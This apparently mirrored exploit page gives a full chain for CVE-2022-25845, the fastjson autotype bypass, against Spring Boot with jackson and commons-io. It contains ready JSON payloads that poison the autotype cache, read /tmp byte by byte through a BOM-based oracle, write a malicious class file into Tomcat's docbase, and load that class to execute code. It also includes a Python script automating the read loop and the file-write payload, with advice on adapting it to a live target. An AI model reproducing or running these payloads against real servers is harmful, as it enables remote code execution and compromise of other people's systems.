## https://sploitus.com/exploit?id=307C3200-FE5B-5EB0-AA07-6048A1193D91
# CVE-2022-25845-In-Spring
# Main dependencies
The chain only works when both of these libraries are on the target's classpath: jackson (jackson-core) supplies the Step 1 classes (`InputCoercionException`, `JsonParser`, `UTF8StreamJsonParser`), and commons-io supplies the stream wrappers used in Steps 2 and 3.
1. jackson
2. commons-io
# Quick reproduction
1. Import the project into IDEA and build it with `mvn install`.
2. Build the image from the Dockerfile (`docker build .`) and run the container.
3. Run `src/test/java/POC.java`; it executes `touch /tmp/pwned` on the target.
# Exploitation walkthrough
## Step 1: Get `java.io.InputStream` into the fastjson autotype cache
CVE-2022-25845 is the autotype bypass in fastjson before 1.2.83. Two behaviours of `checkAutoType` are chained: with the outer `@type` set to `java.lang.Exception`, a second `@type` naming any `Throwable` subclass is accepted, and a class that already has a deserializer in fastjson's cache is returned without going through the deny list. The payload below uses the exception route to load jackson's `InputCoercionException`; building the deserializer for its `p` field (a `JsonParser`) leaves `com.fasterxml.jackson.core.JsonParser` in the cache. With `JsonParser` cached, entry `c` loads `UTF8StreamJsonParser` as a subclass of it, and its `in` parameter is a `java.io.InputStream`, which ends up in the cache the same way. That cached `InputStream` is what Steps 2 and 3 rely on. The `$ref` entries `b` and `d` point into the JSON strings held in `a` and `c`, so fastjson parses those strings while resolving the references.
```json
{
"a": "{ \"@type\": \"java.lang.Exception\", \"@type\": \"com.fasterxml.jackson.core.exc.InputCoercionException\", \"p\": { } }",
"b": {
"$ref": "$.a.a"
},
"c": "{ \"@type\": \"com.fasterxml.jackson.core.JsonParser\", \"@type\": \"com.fasterxml.jackson.core.json.UTF8StreamJsonParser\", \"in\": {}}",
"d": {
"$ref": "$.c.c"
}
}
```
![Screenshot 2024-11-07 21.36.27](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.36.27.png)
## Step 2: Read `/tmp` over the `file:` protocol to learn the name of Tomcat's docbase directory
Spring Boot's embedded Tomcat keeps its docbase in a temp directory with a random name (`tomcat-docbase.<port>.<random>`), so the listing of `/tmp` is needed before anything can be written there. The read goes through `jdk.nashorn.api.scripting.URLReader`, which opens an arbitrary URL; a `file:` URL pointing at a directory returns its entry names. Nashorn ships only with JDK 8 to 14 (it was removed in JDK 15), so this step is tied to the target's Java version.
> The content is recovered one byte at a time. `${data}` is the bytes already known followed by one candidate byte, handed to the inner `BOMInputStream` as a byte-order mark; whether the stream really begins with that sequence produces an observable difference in the response, so each request answers one yes/no question and the listing is rebuilt byte by byte.
```json
{
"a": {
"@type": "java.io.InputStream",
"@type": "org.apache.commons.io.input.BOMInputStream",
"delegate": {
"@type": "org.apache.commons.io.input.BOMInputStream",
"delegate": {
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "jdk.nashorn.api.scripting.URLReader",
"url": "${file}"
},
"charsetName": "UTF-8",
"bufferSize": "1024"
},
"boms": [
{
"charsetName": "UTF-8",
"bytes": ${data}
}
]
},
"boms": [
{
"charsetName": "UTF-8",
"bytes": [1]
}
]
},
"b": {"$ref":"$.a.delegate"}
}
```
![Screenshot 2024-11-07 21.35.56](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.56.png)
## Step 3: Write the malicious bytecode into the docbase directory
`${shellcode}` is the compiled class file carried as a Java `String`, with `iso-8859-1` used at every hop so that each character maps to exactly one byte; `${size}` is its length in bytes. Entry `a` tees whatever is read from the `CharSequenceInputStream` into a `LockableFileWriter` on `${file2write}`, and entry `b` wraps `a` in an `XmlStreamReader`, whose constructor reads the stream and so drives the copy. The writer is opened with `append` set to `true`, so a class too large for one request can be written in several slices. Tomcat's web application class loader searches `WEB-INF/classes` beneath the docbase, so `${file2write}` is the class's package path under that directory.
```json
{
"a": {
"@type": "java.io.InputStream",
"@type": "org.apache.commons.io.input.AutoCloseInputStream",
"in": {
"@type": "org.apache.commons.io.input.TeeInputStream",
"input": {
"@type": "org.apache.commons.io.input.CharSequenceInputStream",
"cs": {
"@type": "java.lang.String"
"${shellcode}",
"charset": "iso-8859-1",
"bufferSize": ${size}
},
"branch": {
"@type": "org.apache.commons.io.output.WriterOutputStream",
"writer": {
"@type": "org.apache.commons.io.output.LockableFileWriter",
"file": "${file2write}",
"charset": "iso-8859-1",
"append": true
},
"charset": "iso-8859-1",
"bufferSize": 1024,
"writeImmediately": true
},
"closeBranch": true
}
},
"b": {
"@type": "java.io.InputStream",
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "org.apache.commons.io.input.XmlStreamReader",
"inputStream": {
"$ref": "$.a"
},
"httpContentType": "text/xml",
"lenient": false,
"defaultEncoding": "iso-8859-1"
},
"charsetName": "iso-8859-1",
"bufferSize": 1024
},
"c": {}
}
```
![Screenshot 2024-11-07 21.37.04](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.37.04.png)
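The two templated steps above are easier to drive from a script than by hand. The following is an added example, not the repository's `POC.java`: it fills the Step 2 template for a byte-at-a-time read loop and the Step 3 template for the class-file write, and checks that the bytes the target will write match the class bytes. `STEP2` and `STEP3` are the page's payloads (the Step 3 one kept with its key-less, comma-less `java.lang.String` value, which fastjson accepts but a strict JSON parser does not, so it stays a raw string rather than a dict). Everything else is this example's own: the function names, the `oracle` callback (how an HTTP response is classified as hit or miss is target-specific and not described on the page), the constructed `/tmp` listing, and the constructed class-file prefix.

```python
"""Builders for the Step 2 read oracle and the Step 3 file-write payload.
Added example, not the repository's POC.java: STEP2/STEP3 are the page's
payloads; everything else (names, oracle callback, sample data) is assumed."""
import json
import re
from typing import Callable, Iterable

# Step 2 payload from the page; ${data} is the guessed prefix as a JSON int array.
STEP2 = '''{"a": {
  "@type": "java.io.InputStream",
  "@type": "org.apache.commons.io.input.BOMInputStream",
  "delegate": {
    "@type": "org.apache.commons.io.input.BOMInputStream",
    "delegate": {
      "@type": "org.apache.commons.io.input.ReaderInputStream",
      "reader": {"@type": "jdk.nashorn.api.scripting.URLReader", "url": "${file}"},
      "charsetName": "UTF-8", "bufferSize": "1024"},
    "boms": [{"charsetName": "UTF-8", "bytes": ${data}}]},
  "boms": [{"charsetName": "UTF-8", "bytes": [1]}]},
 "b": {"$ref": "$.a.delegate"}}'''

# Step 3 payload with the page's brace layout kept as-is: the java.lang.String
# value has no key and no comma, so this is fastjson input, not strict JSON.
STEP3 = '''{"a": {
  "@type": "java.io.InputStream",
  "@type": "org.apache.commons.io.input.AutoCloseInputStream",
  "in": {
    "@type": "org.apache.commons.io.input.TeeInputStream",
    "input": {
      "@type": "org.apache.commons.io.input.CharSequenceInputStream",
      "cs": {"@type": "java.lang.String" "${shellcode}",
      "charset": "iso-8859-1", "bufferSize": ${size}},
    "branch": {
      "@type": "org.apache.commons.io.output.WriterOutputStream",
      "writer": {"@type": "org.apache.commons.io.output.LockableFileWriter",
        "file": "${file2write}", "charset": "iso-8859-1", "append": true},
      "charset": "iso-8859-1", "bufferSize": 1024, "writeImmediately": true},
    "closeBranch": true}},
 "b": {
  "@type": "java.io.InputStream",
  "@type": "org.apache.commons.io.input.ReaderInputStream",
  "reader": {"@type": "org.apache.commons.io.input.XmlStreamReader",
    "inputStream": {"$ref": "$.a"}, "httpContentType": "text/xml",
    "lenient": false, "defaultEncoding": "iso-8859-1"},
  "charsetName": "iso-8859-1", "bufferSize": 1024},
 "c": {}}'''


def _js(s: str) -> str:
    """JSON-escape s without the surrounding quotes, for splicing into a template."""
    return json.dumps(s)[1:-1]


def step2_payload(url: str, guess: bytes) -> str:
    """One probe: does the content behind url start with guess?"""
    return STEP2.replace("${file}", _js(url)).replace("${data}", json.dumps(list(guess)))


def recover_bytes(url: str, oracle: Callable[[str], bool], max_len: int = 256,
                  alphabet: Iterable[int] = range(256)) -> bytes:
    """Grow the known prefix one byte per hit; stop when no candidate byte matches.
    oracle(payload) -> True on a hit; turning the HTTP response into that boolean
    is target-specific and assumed here."""
    known, alphabet = b"", list(alphabet)
    while len(known) < max_len:
        hit = next((c for c in alphabet if oracle(step2_payload(url, known + bytes([c])))), None)
        if hit is None:
            break
        known += bytes([hit])
    return known


def step3_payload(class_bytes: bytes, dest_path: str) -> str:
    """Embed a .class file as a Java String. ISO-8859-1 maps bytes 0x00..0xFF to
    U+0000..U+00FF, so decoding here and writing through the iso-8859-1 writer on
    the target reproduces the bytes exactly; json.dumps escapes them as \\u00XX."""
    return (STEP3.replace("${shellcode}", _js(class_bytes.decode("latin-1")))
                 .replace("${size}", str(len(class_bytes)))
                 .replace("${file2write}", _js(dest_path)))


def written_bytes(payload: str) -> bytes:
    """Pre-flight check: what the target's iso-8859-1 writer will put on disk."""
    start = payload.index('"java.lang.String" "') + len('"java.lang.String" "')
    end = payload.index('",\n', start)
    return json.loads('"' + payload[start:end] + '"').encode("latin-1")


def fake_oracle_for(secret: bytes) -> Callable[[str], bool]:
    """Constructed stand-in for the target: a hit when the guessed prefix matches."""
    def oracle(payload: str) -> bool:
        guess = json.loads(re.search(r'"bytes": (\[[\d, ]*\])', payload).group(1))
        return secret.startswith(bytes(guess))
    return oracle


if __name__ == "__main__":
    # Constructed directory listing; a real /tmp holds tomcat-docbase.<port>.<random>.
    listing = b"hsperfdata_app\ntomcat-docbase.8080.1234567890\ntomcat.8080.987654321\n"
    print(recover_bytes("file:///tmp", fake_oracle_for(listing)).decode())
    # Constructed class-file prefix (CAFEBABE, version 52); use the compiled HackException for real.
    print(step3_payload(b"\xca\xfe\xba\xbe\x00\x00\x00\x34",
                        "/tmp/tomcat-docbase.8080.1234567890/WEB-INF/classes/com/chenzai/HackException.class")[:120])
```

Against a live target, replace `fake_oracle_for` with a function that sends the payload and returns whether the response matched the "hit" shape seen while calibrating on a known prefix; restricting `alphabet` to printable ASCII plus `\n` cuts the request count for a directory listing. Run `written_bytes` on the Step 3 payload before sending it, and if the class is larger than one request can carry, split it and send the slices in order, since the writer appends.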
## Step 4: Trigger loading of the malicious class
`java.lang.Exception` as the outer `@type` again admits any `Throwable` subclass, and the web application class loader now finds `com.chenzai.HackException` in the class file written in Step 3. Loading and instantiating it runs whatever the class's initializer does (in this project, `touch /tmp/pwned`).
```json
{
"@type":"java.lang.Exception",
"@type":"com.chenzai.HackException"
}
```
![Screenshot 2024-11-07 21.35.32](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.32.png)
# References / acknowledgements
- [GeekCon 2024](https://www.geekcon.top/js/pdfjs/web/viewer.html?file=/doc/ppt/GC24_SpringBoot之殇.pdf)
- jsjcw